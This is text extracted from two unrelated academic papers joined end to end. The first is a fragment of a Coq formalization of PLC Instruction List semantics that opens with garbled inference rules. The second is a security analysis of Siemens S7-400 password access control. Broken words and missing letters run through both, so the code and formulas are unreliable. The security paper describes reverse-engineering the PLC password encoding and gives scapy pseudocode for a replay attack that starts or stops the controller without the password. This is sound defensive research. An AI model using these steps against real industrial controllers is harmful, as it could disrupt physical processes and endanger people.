/prime,i+1,E)P(i)=RS x /prime= [x/mapsto x reg] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)RS JMPC-trueP(i)=JMPC lbl (reg)=T P/turnstileleft(c, ,i,E ) (c, ,lbl,E )P(i)=JMPC lbl (reg)=F P/turnstileleft(c, ,i,E ) (c, ,i +1,E)JMPC-false JMPCN-falseP(i)=JMPCN lbl (reg)=F P/turnstileleft(c, ,i,E ) (c, ,lbl,E )P(i)=JMPCN lbl (reg)=T P/turnstileleft(c, ,i,E ) (c, ,i +1,E)JMPCN-true JMPP(i)=JMP lbl P/turnstileleft(c, ,i,E ) (c, ,lbl,E )P(i)=ADD op /prime= [reg/mapsto reg+op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)ADD SUBP(i)=SUB op /prime= [reg/mapsto reg op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)P(i)=MUL op /prime= [reg/mapsto reg op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)MUL ANDP(i)=AND op /prime= [reg/mapsto reg op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)P(i)=OR op /prime= [reg/mapsto reg op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)OR ANDNP(i)=ANDN op /prime= [reg/mapsto reg op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)P(i)=ORN op /prime= [reg/mapsto reg op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)ORN NOTP(i)=NOT op /prime= [reg/mapsto op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)P(i)=EQ op /prime= [reg/mapsto reg==op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)EQ GEP(i)=GE op /prime= [reg/mapsto reg op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)P(i)=GT op /prime= [reg/mapsto reg < op ] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)GT P(i)=TONTx,Pt (reg)=F /prime= [Tx.Q/mapsto F,Tx.ET /mapsto 0] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)TON-off P(i)=TONTx,Pt (reg)=TTx.ET < Pt /prime= [Tx.Q/mapsto F,Tx.ET /mapsto Tx.ET + ] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)TON-on P(i)=TONTx,Pt (reg)=TTx.ET > =Pt /prime= [Tx.Q/mapsto T,Tx.ET /mapsto Tx.ET + ] (c, ,i,E ) (c, /prime,i+1,E)TON-end P(i)=RET P/turnstileleft(c, ,i,E ) (c, , 0,O)RET x:Var in /prime= [xi/mapsto vi] P/turnstileleft(c, ,i,I ) (c, /prime,i,E )InputP/turnstileleft(c, ,i,O ) (c+1, ,i,I )Output Figure 4. IL Operational semantics scan cycle time limit. We chose here not to consider this kind of errors. They can be treated at the level of the syntactic analysis or by static analysis of the program. ThetransitionrelationfortheTONinstructionis given by the rules TON-off ,TON-on andTON- endof Figure 4. The elapsed time variable ET of the TON timer is incremented by the global constant when the timer is activated (the eval- uation register value is true). The timer output Qis activated when the elapsed time variable ET is greater or equal to the timer delay parameter PT. For the inputtransition, the variables state function is updated by the input variables values given by the program global environment. The output transition corresponds to the cycle identi er incrementation and the change of the con gurationmode. The program environment will have to read t h ev a r i a b l e ss t a t ed u r i n gt h i st r a n s i t i o nt og e tt h e values of the outputs of the system. After this de nition of the semantics of the IL language, we present in the next section our for- malization of this semantics in the proof assistant Coq. IV. Coq formalizations As we mentioned before, we intend to develop a certi ed compiler from IL to the C language. We choose to formalize the IL semantics in the Coq proof assistant to make it easier to connect our de- velopment to the already existing certi ed compiler for C : the CompCert [8] compiler. We also want to produce from this formal development a certi ed executable. The Coq extraction mechanisms will allow us to produce such executable. 130 131 122 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. In the reasoning about IL programs, we will have to deal with proprieties about booleans and naturals numbers. In this development, we chose to use the Coq extension SSRe ect for its rich libraries on booleans and natural numbers. We also use SSRe ect generic library for lists and its interface for types with decidable equality. More details about this libraries can be found in the SSRe ect manual [7] and tutorial [9]. A. Syntax TheCoq system provides a very powerful mech- anism to de ne recursive or nite type or set. This mechanism is called inductive type and is very useful when de ning the syntax of a programming language. We de ne the IL syntax presented in Section III-C, using the Coq inductive type mech- anism. The de nitions are given in Figure 5. In these de nitions, the types timeand identare a renaming of the Coq standard type nat.T h e r s t one corresponds to the type of variable identi ers. Sinceweconsiderdiscretetime,thetype timeisthe type of time values. A piece of IL code corresponds toalistofinstruction.Werepresentitasanelement of the type code := seq Instr1. Inductive ILcst : Type := | Ncst (n : nat) | Bcst (b : bool) | Tcst (t : time). Inductive Operands : Type := | var (id : ident) | cst (c : ILcst). Inductive Instr : Type := | LD (op : Operands) | ST (x : ident) | SR (x : ident) | RS (x : ident) | JMP (l : nat) | JMPC (l : nat) | JMPCN (l : nat) | ADD (op : Operands) | SUB (op : Operands) | MUL (op : Operands) | AND (op : Operands) | OR (op : Operands) | ANDN (op : Operands) | ORN (op : Operands) | NOT (op : Operands) | EQ (op : Operands) | GT (op : Operands) | GE (op : Operands) | TON (q et : ident) (pt : time) | RET. Figure 5. Coq de nition of the IL syntax B. Semantics Our formalization of the IL semantics de ned in Section III-D is parameterized by the following Coq global variables: 1seqi st h et y p eo fl i s ti n SSRe ect.Variables (delta:time)(pi:seq ident ). Variables (p_ival:nat ident nat)(P:code). The variable deltarepresents the cycle duration time. The list of program input variables is rep- resented by pi. In order to de ne the semantics transitions, we need to know the input variables in order to update them with the values given by the program environment at the beginning of each cycle. Those values are represented by the function p_ivalthat takes as parameters a cycle identi er and a variable identi er and returns a value. When we look at the de nition of the transition relation for the IL semantics given in Figure 4, we notice that it can be decomposed into two sub-operations. First, there is the states updating function. It returns a new state according to the evaluated program instruction. Second, there is the program location successor. Normally it returns the incremented value of the current location, unless the instruction is a branching. The con guration transitionfunctioncanbede nedontopofthesub- operations just by checking the execution mode. States:For the de nition of the variable states a n ds i n c eb o o l e a n sc a nb ei n j e c t e di ni n t e g e r s2,w e chooseto representthenaturalnumbersasthedata domain of the IL variables. We de ne a state as an object of the type State. Definition State:=nat (ident nat). Definition state_u psiv:State:= ifiis(Sn)then (s.1,funx=>ifn==xthen velse s.2x) else(v,s.2). A program state s : State is a pair. The rst element of the pair, denoted s.1,r e p r e s e n t st h e value of the current register. The second element of the pair, denoted s.2, represents the function that maps every program variable to its value. We de ne also some state transformation function. The function state_up updatesthevalueofastate sfor a given variable determined by its second argument iwith a value v.I fiis equal to zero the current register value is updated otherwise the variables mapping function is updated. Instruction evaluation: The de nition of the IL instruction evaluation function is presented in Fig- 2This can be automatically done in Coq using coercions. 131 132 123 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. Definition eval_instr (s : State) (i : Instr) : State := match iwith | LD op => state_up s 0 (s op) | ST x => state_up s x.+1 s.1 | SR x => state_up s x.+1 (BofN s.1 || BofN (s.2 x)) | RS x => state_up s x.+1 (~~ BofN s.1 && BofN (s.2 x)) | AND op => state_up s 0 (BofN s.1 && BofN (s op)) | OR op => state_up s 0 (BofN s.1 || BofN (s op)) | NOT op => state_up s 0 (~~ BofN (s op)) | ANDN op => state_up s 0 (BofN s.1 && ~~ BofN (s op)) | ORN op => state_up s 0 (BofN s.1 || ~~ BofN (s op)) | ADD op => state_up s 0 (s.1 + s op) | MUL op => state_up s 0 (s.1 * s op) | SUB op => state_up s 0 (s.1 - s op) | GT op => state_up s 0 (s.1 < s op) | GE op => state_up s 0 (s.1 <= s op) | EQ op => state_up s 0 (s.1 == s op) |T O Nqe tp t= > ifBofN s.1 then let s := state_up s et.+1 (s.2 et + d) in ifs.2 et < pt then state_up s q.+1 0 else state_up s q.+1 1 else let:s : =s t a t e _ u pse t . + 10 instate_up s q.+1 0 |_= >s end. Figure 6. IL instructions evaluation function ure 6. It follows the inference rules given in Fig- ure 4. The function eval_instr takes two argu- ments, a state and an instruction, and returns a new state. For example, the evaluation of a load instruction will return an updated state where the current register is equal to the value of the instruc- tion operands. Another example is given by the set instruction SR x. For this case, the variable xis updated with the disjunction of its previous value and the value of the current register. For the opera- tors that are de ned only for booleans values (like: SR,AND...), we use the function BofNthat return the original boolean value of a boolean variable that was translated to a natural numbers. In the de nition of Figure 6 and the following de nitions, we use an SSRe ect notation for a natural number successor. When we write x.+1this correspond to the successor of xorx+1. Con gurations transition: the IL con gurations, presented in Section III-D, are encoded as a Coq product type. Inductive ILmode:=I|O|E. Definition ILConf:=nat State nat ILmode. In a con guration, cycle identi er and location are represented by naturals numbers. The execution mode is represented by an element of the inductiveDefinition instr_succ (i : Instr) x (s : State) : nat := match iwith |J M Pl= >l | JMPC l => ifBofN s.1 then lelse x.+1 | JMPCN l => if~~ BofN s.1 then lelse x.+1 | _ => x.+1 end. Definition transition (Cf : ILConf) := match Cfwith ( c ,s ,l ,m )= > match mwith |I= > let s := state_up_seq s pi (p_ival c) in (c, s , l, E) | O => (c.+1, s, l, I) |E= > let I := nth RET P l in ifI == RET then ( c ,s ,0 ,O ) else (c, eval_instr s I, instr_succ I l s, E) end end. Figure 7. IL Con gurations transition function type ILmode. The elements of this nite type cor- responds to the three modes we de ned previously in Section III-D. Since our IL semantics is deterministic, we de ne the con gurations transition relation as a function. TheCoq de nition is given in Figure 7. The transi- tionfunctionproceedsbylookingatthemodeofthe con guration passed as argument. If it is an input mode,thevariablesstatefunctionisupdatedbythe new values of the input variables and the mode is changed to execution . The function state_up_seq is a generalization of the state updating function state_up that updates a list of variables. When the originalcon gurationhasan outputmode,thecycle identi er is incremented and the mode is changed toinput. This two cases correspond to the inference rules InputandOutput of Figure 4. When the con guration mode is execution ,t h e transition function will rst check the instruction corresponding to the current con guration. This instruction corresponds to the lthelement of the list of instructions of the code P.W eu s eh e r et h e generic function nthfrom SSRe ect seqlibrary. If the element at the position lofPis equal to RET thentherule RETofFigure4isapplied.Otherwise thecycleand the modewill not be modi ed. The variable state will be updated using the function eval_instr . The con guration location is updated usingthefunction instr_succ thatreturnsthesuc- cessor of a location according to the corresponding instruction and the state of the current register. 132 133 124 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. Program executions: After the de nition of the IL con guration transition function, we de ne a program execution as the transitive closure of the transition relation. Since it is not always possible to know how many transition are needed to execute an IL program, we de ne the program execution as a propositional relation rather than a compu- tational function. The de nition of execis given Inductive exec (c1 c2 : ILConf) : Prop := | exec_step : transition c1 = c2 exec c1 c2 | exec_star cf : transition c1 = cf exec cf c2 exec c1 c2. Lemma exec_splitI_prodl : forall cns 0s , exec (c, s0, 0, I) (c + n.+1, s, 0, O) exists r, exec (c, s0, 0, I) (c, r, 0, O) exec (c.+1, r, 0, I) (c + n.+1, s, 0, O). Lemma exec_splitI_prodr : forall cns 0s , exec (c, s0, 0, I) (c + n.+1, s, 0, O) exists r, exec (c, s0, 0, I) (c + n.+1, r, 0, I) e x e c( c+n . + 1 ,r ,0 ,I )( c+n . + 1 ,s ,0 ,O ) . Figure 8. IL program execution de nition and lemmas in the Figure 8. It corresponds to the standard transitive closure predicate. In addition to this de - nition, we prove some generic properties about any program executions. The rst lemma of Figure 8 states that if the execution of a program starting from the con gurations (c, s0, 0, I) ends at the con guration (c + n.+1, s, 0, O) ,i tm u s tc o m e through a con guration where the cycle is the rst execution cycle and the mode is output. The second lemma states the same property but for the last execution cycle. The proofs of this two lemmas are straightforward. They use induction and the property of monotonicity of the execrelation for cycles. Using our IL semantics, we formalized a simple example of PLC program and proved some prop- erties about it. This is presented in the following sub-section. C. Example We formalized a simple example of PLC pro- gram written in the IL language. It is one of the examples given in the book Programmable Logic Controller s [10]. Description: We consider the example of a PLC program for opening and closing a car park en-trance barrier. The barrier is opened when the cor- rect amount of money is inserted in the collection box. The barrier will stay open for 10 seconds. The program has three inputs and two outputs. The rst input is associated to a sensor in the collection box. When the barrier is down it trips a switch and when up it trips another switch. These switches are associated to the two others input variables of the program. They give the position of the barrier to the program. The opening and closing of the barrier is managed by a valve-piston system. The two program outputs are associated to the two valves of this system. The program source Inputs: X400 (I0) X401 (I1) X402 (I2) Outputs: X430 (Q0) X431 (Q1)LD X400 OR Y430 ANI M100 ANI Y431 OUT Y430 LD X401 OUT T450 K1 0 LD T450 OUT M100 LD M100 OR Y431 ANI X402 ANI Y430 OUT Y431 ENDDefinition P1 := [:: LD I0; OR Q0; ANDN T0; ANDN Q1; ST Q0; LD I1; TON T0 ET0 PT; LD T0; OR Q1; ANDN I2; ANDN Q0; ST Q1; RET ]. Figure 9. Car barrier program in Mitsubishi format and in Coq in theMitsubishi format, which does not follow the standard, and the corresponding Coq de nition are presented in Figure 9. The output Q0for raising the entrance barrier is activated when the input I0 is activated. It remains on until the timer output variable T0is activated. This happens when the input I1, indicating that the barrier is up, remains on for 10 seconds. At the end of the time delay the output Q1is activated telling the valve-piston system to lower the barrier. In a normal state, the input variables I1and I2should have opposite boolean values. When they have the same values, it means the barrier is in the process of being lowered or raised. Properties: weformalizedandprovedsomesafety properties about the IL program presented above. For example, Figure 10 shows two lemmas that prove some properties about the output Q0and the timer output T0.T h el e m m a barrier_open 133 134 125 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. Lemma barrier_open : forall cs 0s , exec (c,s0,0,E) (c,s,0,O) BofN (s Q0) = (BofN (s0 I0) || BofN (s0 Q0)) && ~~ BofN (s0 T0) && ~~ BofN (s0 Q1). Lemma timer_on : forall cs 0s , exec (c, s0, 0, E) (c, s, 0, O) BofN (s T0) = BofN (s0 I1) && (PT <= (s0 ET0)). Figure 10. IL Con gurations transition states that after one cycle execution, the output Q0will be on if the input I0was on at the input phase or Q0w a so ni nt h ep r e v i o u sc y c l e ,a n dt h e timer output and the output Q1were o during the previous cycle. The lemma timer_on states that the timer output will be on if and only if the input I1is on and the elapsed time is greater or equal to the prede ned time delay. The proofs of this two lemmas are straight forward and proceed by case analysis over the inductive predicate exec. V. Related works T h e r ei sn u m e r o u sp u b l i c a t i o n so nt h eu s eo f formal methods for the veri cation of PLC pro- grams.Modelcheckingisthemostusedapproachin these veri cation works. In [2] a semantics of IL is de ned using timed automaton. The language sub- set contains TON timers but data types are limited to booleans. The formal analysis is performed by the model checker UPPAAL. In [3] an operational semantics of IL is de ned. A signi cant sub-set of IL is supported by this semantics, but it does not include timer instructions. The semantics is encoded in the input language of the model checker Cadence SMV and linear temporal logic (LTL) is used to specify properties of PLC programs.
PLC_access_control_a_security_analysis.pdf
A Programmable Logic Controller (PLC) is a very common industrial control system device used to control output devices based on data received (and processed) from input devices. Given the central role that PLCs play in deployed industrial control systems, it has been a preferred target of ICS attackers. A quick search in the ICS-CERT repository reveals that out of a total of 589 advisories, more than 80 target PLCs. Stuxnet attack, considered the most famous reported incident on ICS, targeted mainly PLCs. Most of the PLC reported incidents are rooted in the fact that the PLC being accessed in an unauthorized way. In this paper, we investigate the PLC access control problem. We discuss several access control models but we focus mainly on the commonly adopted password-based access control. We show how such password- based mechanism can be compromised in a realistic scenario as well as the list the attacks that can be derived as a consequence. This paper details a set of vulnerabilities targeting recent versions of PLCs (2016) which have not been reported in the literature.
PLC Access Control: A Security Analysis Haroon Wardak Information and Computer Science Department KFUPM, Dhahran, 31261, KSA Email: [email protected] Zhioua Information and Computer Science Department KFUPM, Dhahran, 31261, KSA Email: [email protected] Almulhem Computer Engineering Department KFUPM, Dhahran, 31261, KSA Email: [email protected] Keywords-PLC; SCADA; Industrial Control Systems; Access Control; Passwords; I. I NTRODUCTION A Programmable Logic Controller (PLC) is an important component in an ICS system. It is a control device used to automate industrial processes via collecting input data from eld devices such as sensors, processing it, then send commands to actuators devices such as motors. Being a pivotal device in ICS systems, PLCs are preferred target for cyber security attacks. ICS-CERT, the repository for ICS speci c incidents, includes a large number of PLC related issues. A quick search performed in November 2016 reveals that out of a total of 589 advisories, 89 target directly PLCs and out of a total of 114 alerts, 17 involve PLCs. Another manifestation of the exposure of PLCs to cyber security attacks is the Stuxnet malware [1] which is designed to attack primarly PLCs of the Iranian nuclear facility. PLC security issues range from simple DoS to sophisti- cated remote code execution vulnerabilities. Most of PLC attacks are possible because attackers could have access and compromise the PLC device. PLC Access Control can be implemented at different layers: network layer, physical access, rmware, etc. In this paper, we discuss the different access control models for PLCs, but we focus on the most commonly deployed access control mechanism, namely,password-based access control. Using recent PLC devices (2016) with updated rmware, we show how passwords are stored in PLC memory, how passwords can be intercepted in the network, how they can be cracked, etc. As a conse- quence of these vulnerabilities, we could carry out advanced attacks on ICS system setup, such as replay, PLC memory corruption, etc. II. PLC V ULNERABILITIES A PLC is a particular type of embedded devices that is programmed to manage and control physical components (motors, valves, sensors, etc.) based on system inputs and requirements. A PLC typically has three main components, namely, an embedded operating system, control system soft- ware, and analog and digital inputs/outputs. Hence, a PLC can be considered as a special digital computer executing speci c instructions that collect data from input devices (e.g. sensors), sending commands to output devices (e.g. valves), and transmitting data to a central operations center. PLCs are commonly found in supervisory control and data acquisition (SCADA) systems as eld devices. Because they contain a programmable memory, PLCs allows a cus- tomizable control of physical components through a user- programmable interface. The ICS-CERT repository, dedicated to ICS related se- curity incidents, includes several reports involving PLC vulnerabilities and alerts. Most of the reports are relatively recent (2010 and later). The increase in ICS and PLC incidents coincides with the increasing interconnection of ICS and corporate networks which became a necessity to improve ef ciency, minimize costs, and maximize pro ts. This, however, exposes ICS systems, and PLCs in particular, to various types of exploitation. Most of PLC vulnerabilities can be grouped into three categories, namely, network vulnerabilities, rmware vulner- abilities, and access control vulnerabilities. PLCs are increasingly required to be interconnected with corporate LANs, Intranets, and Internet. Due to their increas- ing connectivity, PLCs are expected to support mainstream network protocols. Such standard protocols (e.g. TCP, IP, ARP, etc.) facilitate interconnection, but bring their own vul- nerabilities (e.g. Spoo ng, Replay, MITM, etc.). However, World Congress on Industrial Control Systems Security (WCICSS-2016) 978-1-908320-63/6/$31.00 2016 IEEE 56 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:13 UTC from IEEE Xplore. Restrictions apply. Table I EXAMPLES OF PLC NETWORK VULNERABILITIES AS REPORTED IN ICS-CERT ADVISORIES Advisory Affected product Vulnerability Exploit ICSA-11-223-01A Siemens SIMATIC PLCs Use of Open Communication Protocol Execute unauthorized commands ICSA-15-246-02 Shneider Modicon PLC Web Server Remote le inclusion Remote le execution ICSA-12-283-01 Siemens S7-1200 Web Application Cross-site Scripting Run malicious javascript on Engineer- ing station browser ICSA-15-274-01 Omron PLCs Clear text transmission of sensitive informationPassword snif ng ICS-ALERT-15-224-02 Schneider Electric Modicon M340 PLC StationLocal le inclusion Directory traversal/ le manipulation the most common type of network vulnerabilities is related to ICS speci c network protocols such as Modbus, pro net, DNP3, etc. which include lack of authentication, lack of integrity checking of data sent over the protocol. Table I lists a sample set of PLC network vulnerabilities as reported in ICS-CERT repository. Firmware is the operating system of controller devices, in particular, PLCs. It consists in data and code bundled together with several features such as OS kernel and le system. As any software, a rmware is prone to aws and security vulnerabilities. Vulnerabilities include buffer over ow, improper input validation, awed protocol imple- mentation, etc. More importantly, rmware and patches must be certi ed by vendors to make sure that they will not break system functionalities. Unfortunately, a large number of PLC vendors use weak rmware update validation mechanisms allowing unauthenticated rmware updates [2]. Table II lists a sample set of PLC rmware vulnerabilities as reported in ICS-CERT repository. A PLC is a sensitive component of ICS systems and hence only authorized entities should be allowed to access it and any such access should be appropriately authenticated. The most common PLC access control vulnerabilities include poor authentication mechanism, lack of integrity methods, awed password protection, and awed communication pro- tocols. For example, PLC vendors use hidden or hard coded usernames and passwords to fully control the device. Attack- ers setup a database of default usernames and passwords and can brute-force such devices. Once unauthorized access is performed, an adversary can retrieve sensitive data, modify values, manipulate memory, gain privilege, change PLC logic, etc. III. PLC A CCESS CONTROL A. Physical access control Proper deployment and access control of PLC as well as other ICS controllers mitigate signi cantly security breaches either from internal or external adversaries. Access control vulnerabilities can be signi cantly reduced by implement- ing recommendations in established standards such as the ANSI/ISA-99 [3]. It is a complete security life-cycle pro- gram that de ne procedures for developing and deployingpolicy and technology solutions to implement secure ICS systems. ISA99 is based on two main concepts, namely, zones and conduits, whose goal is to separate various subsystems and components. Devices that share common security requirements have to be in the same logical or physical group and the communication between them take place through conduits. This way, network traf c con den- tiality and integrity is protected, DoS attacks are prevented and malware traf c is ltered. In addition, control system administration must restrict physical and logical access to ICS devices to only those authorized individuals expected to be in direct contact with system equipments. B. Network access control ICS network access control is typically implemented in layers. The rst layer is network logical segmentation achieved typically with security technologies such as re- walls and VPNs. All controller devices, in particular PLCs, must be located behind rewalls and not connected directly to corporate or other networks. Most importantly, critical devices should not be exposed directly to Internet. Remote access to all ICS devices should be through secure tunnels such as VPNs. It is important to note that rewall and VPN technologies used in ICS systems are different from main- stream rewall and VPN used in typical IT networks. Indeed, many vendors many vendors provide special appliances for securing ICS networks. For example, Siemens provides a special type of switch, namely, Scalance S, with rewall and VPN features to secure the communication from/to PLCs. Finally, even with full deployment, these technologies may not block all breaches due to weak or inadequate con gurations and ltering rules. C. Password access control Password based access control is by far the most com- monly used type of access control. Most PLC devices have built-in password protection to prevent unauthorized access and tampering. For effective password access control, important requirements need to be satis ed. In particular, password protection: must be enabled whenever possible must be properly con gured World Congress on Industrial Control Systems Security (WCICSS-2016) 978-1-908320-63/6/$31.00 2016 IEEE 57 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:13 UTC from IEEE Xplore. Restrictions apply. Table II EXAMPLES OF PLC FIRMWARE VULNERABILITIES AS REPORTED IN ICS-CERT ADVISORIES Advisory Affected product Vulnerability Exploit ICSA-16-026-02 Rockwell MicroLogix 1100 PLC Stack-based buffer over ow Remote execution of arbitrary code ICSA-13-116-01 Galil RIO-47100 PLC Improper input validation (allowing repeated requests to be sent in a single session)Denial of Service ICSA-14-086-01 Shneider Modbus Serial Driver Stack-based buffer over ow Arbitrary code execution with user privilege ICSA-12-271-02 Optimalog Optima PLC Improper handling of incomplete packets Denial of Service ICSA-16-152-01 Moxa UC 7408-LX-Plus Device Non-recoverable rmware overwrite Permanently harming the device Figure 1. PLC Lab Setup must use strong encoding scheme must not need high processing operations must not use hardcoded credentials must be frequently and periodically changed. In addition, it is highly recommended to delete default accounts or change default passwords. Unfortunately, not all vendors comply with and enforce these principles, therefore several password related incidents are reported. IV. S ECURITY ANALYSIS OF PLC PASSWORD ACCESS CONTROL To carry out a realistic security analysis of PLC access control, we selected a commonly used PLC model, namely, Siemens S7-400, and setup a lab including common ICS con guration (Fig. 1). Based on S7-400 documentation, several test cases have been performed which revealed three access control levels for the PLC, namely, no protection, write-protection and read/write-protection. The rst level of access control, which is the default level, does not provide any form of access control. Using this level, any entity (device, station, etc.) can access the PLC processes and data without restriction. Access is possible provided that the remote entity speaks a PLC supported communication protocol (e.g. COTP, Mod- bus, Pro net). The second level, write-protection, provides as its name indicates a write protection on PLC data and processes. That is, any attempt to modify data or processes on the PLC (e.g. Load new program, clear data) is password authenticated. The third level, which is the most restrictive, is read/write-protection. Using that level, any interaction, that is, read from or write to the PLC is password authenti- cated. A. Password policy The con guration software, namely, SIMATIC PCS7 ac- cepts any 8 ASCII characters password. If the password is less than 8 characters long, PCS7 pads it with white spaces. To set a PLC password, a user has to change the protection level and set the password in the PCS7 hardware con guration tool before loading the changes to the PLC. In addition to being loaded to the PLC memory, the password is stored locally in the engineering station s local les. In a normal scenario any command sent to the PLC (e.g. start, stop, clear memory) should be authorized by providing the password. However, since the password is stored locally in the engineering station, PCS7 software will ask for the password only one time after the new con guration is loaded to the PLC. In subsequent interactions, PCS7 will include automatically the password in the packet requests sent to the PLC. B. PLC memory structure As mentioned above, setting a password consists in chang- ing the protection level, selecting a password and then loading the new con guration to the PLC memory. The latter is organized into labeled blocks. Each block holds a speci c type of information (Fig. 2). Most of PLC blocks are used to organized the PLC program into independent sections corresponding to individual tasks. Function Block (FB) is a block that holds user-de ned functions with memory to store associated data. Functions (FC) is used to keep frequently used routines in the PLC operations. Data Block (DB) stores user data. Organization Block (OB) is an interface between operating system and user program, used to determine the CPU behavior, for example, de ne error handling. System World Congress on Industrial Control Systems Security (WCICSS-2016) 978-1-908320-63/6/$31.00 2016 IEEE 58 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:13 UTC from IEEE Xplore. Restrictions apply. Function Block (SFB) and System Functions (SFC) hold low level functions (libraries) that can be called by user programs such as handling the clock and run-time meters. Therefore, information loaded to the PLC is divided into blocks as well. The password is communicated and stored in the System Data Block (SDB). SDB itself is divided into sub-blocks with different roles. The sub-blocks numbered from 0000 to 0999 and from 2000 to 2002 hold data that is updated in each download process. The rest of the sub- blocks are divided into two sets: sub-blocks from 1000 to 1005 should contain data and sub-blocks from 1006 to 1011 should contain con guration data. Loading a new program to the PLC yields to ovewriting all sub-blocks of the SDB block, except the 0000 sub-block which contains the password. If an adversary aims at updating the password, he needs to clear the 0000 block rst with a dedicated command and then set a new password with another command. OB FB FC DB SDB SFC SFB Other Data0000 0001 0093 00220003 0007 0004 0002 0026 0092 0091 0090 0122 0126 0999 2001 2002 1006 1007 1008 1009 1010 10111000 1001 1002 1004 10052000 1003System Data BlocksPLC memory block types Figure 2. S7-400 PLC memory structure C. PLC password snif ng In order to evaluate the security of the password-based access control, a rst step is to sniff the network packets containing the password. Typical network snif ng software is used to capture packets exchanged between the engi- neering station (PCS7) and the PLC during a password setting process (e.g. Wireshark, tcpdump). Since password setting is achieved through load con guration command sent to the PLC, the process is repeated several times with different passwords to collect a good number of samples. The captured traf c is rst ltered to extract complete TCP streams. The streams are then compared using byte compar- ison tools (e.g. Burp Suite Comparator). These tools help nding similarities and differences between TCP streams. This allowed to identify the speci c packets containing the password and the exact bytes shift for the passwordlocation inside the packets. It turned out that the 8 characters password is encoded in each packet. Hence con guration software in the engineering station uses an encoding scheme to encode the password before uploading it to the PLC. It is important to note that when the PLC is con g- ured with no-protection level, sniffed packets during load con guration have the same size as with the other levels of protection (read protection and read/write protection). Hence, packets are padded with random bits in place of the password in case of no-protection level. D. Reverse engineering password encoding scheme After locating the 8 bytes inside the network packets con- taining the password, the next step is to decode the bytes to retrieve the plain-text version of the password. The reverse- engineering started by trying typical encoding schemes, namely, URL encoding, ASCII Hex, Base64, variants of Xor (single-byte, multiple-byte, rolling, etc.). However, none of these typical schemes retrieved the plain text version of the password, pre-set in our samples. Full- edged cryptographic (DES, AES, RC4, etc.) as well as hashing (MD5, SHA512, etc.) functions are excluded in the investigation because of three reasons. First, there is no key exchange stage involved before password communication1. Second, if cryptographic and hashing functions were used, the encoded password bytes would be completely shuf ed compared to the plain text version, which is not the case here (the cipher text is encoded byte by byte). Third, cryptographic and hashing functions are too processing intensive for PLCs. Figure 3. PLC Password Encoding Xor is a very common encoding scheme that is suitable for resource limited hardware devices. As mentioned above, 1This holds for cryptographic functions. World Congress on Industrial Control Systems Security (WCICSS-2016) 978-1-908320-63/6/$31.00 2016 IEEE 59 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:13 UTC from IEEE Xplore. Restrictions apply. the password encoding is not using typical Xor (single- byte, multiple-byte, etc.). Taking into consideration the fact that the encoding is done byte-by-byte and the requirement of a lightweight encoding algorithm, we focused on trying customized Xor transformations. To this end, a represen- tative list of (plain-text password, encoded-text password) pairs have been sampled from the network. Then, using automated scripts to brute-force each byte, we could suc- cessfully reverse-engineer the Xor based encoding scheme. A graphical representation of the nested Xor based encoding scheme is shown in Fig. 3. It is important to note that the PLC is using two variants of the encoding scheme: one used to load a con guration to the PLC and the other is used during the authentication process. Both variants differ by the staic byte constant used: 0x55 and 0xAA . V. PLC A CCESS CONTROL ATTACKS As a consequence of compromising the password based PLC access control, several concrete attacks can be carried out on the PLC ranging from simple replay to unauthorized password update attacks. A. Replay attack A replay attack on the PLC consists in recording a sequence of packets related to a certain legitimate command and then replaying it later without authorization. The attack consists of 3 steps: starting a given command (stop, start, load con guration, clear memory block, etc.), capturing the packets, and replaying the captured packets at a later time. The target PLC may or may not be password protected. are accepted by the TCP/IP kernel at the PLC, We resorted to write a customized python script using scapy [4]. Scapy is a powerful packet manipulation program written in python and hence can be easily used in python scripts. It features a variety of packet manipulation capabilities including: sniff- ing and replaying packets in the network, network scanning, tracerouting, etc. However, the most useful scapy features for our replay attack are the ability to rewrite the sequence and acknowledgement numbers and to match requests and replies. Algorithm 1 shows the core of the python script using the scapy features. The above python program has been tested using two attack scenarios. In the rst scenario, the replay attack was launched from the same host (IP address) used for the capture, that is, the engineering station with the con gura- tion software. In the second scenario, the replay attack was launched from a different host on the same network, that is, the attacker machine with Kali. In each scenario, two types of commands are tried, namely, start and stop which require password authentication. The replay attack was successful in both scenarios for both types of commands. Hence, an unknown attacker machine (without appropriate con gu- ration software) on the same network, can turn the PLC ON or OFF by simply replaying a start or stop commandAlgorithm 1 Replay a sequence of captured packets using Scapy 1:function REPLAY (pcap le, eth interface, srcIP, srcPort) 2: recvSeqNum 0 3: SYN True 4: forpacket in rdpcap(pcap le) do 5: ip packet[IP] 6: tcp packet[TCP] 7: del ip.chksum .Clearing the checksums 8: ip.src srcIP .Attacker s machine IP 9: ip.sport srcPort .Attacker s machine Port 10: iftcp. ags == ACK or tcp. ags == RSTACK then 11: tcp.ack recvSeqNum+1 12: ifSYN or tcp. ags == RSTACK then 13: sendp(packet, iface=eth interface) 14: SYN False 15: continue 16: end if 17: end if 18: rcv srp1(packet, iface=eth interface) 19: recvSeqNum rcv[TCP].seq 20: end for 21:end function without knowing the PLC password. 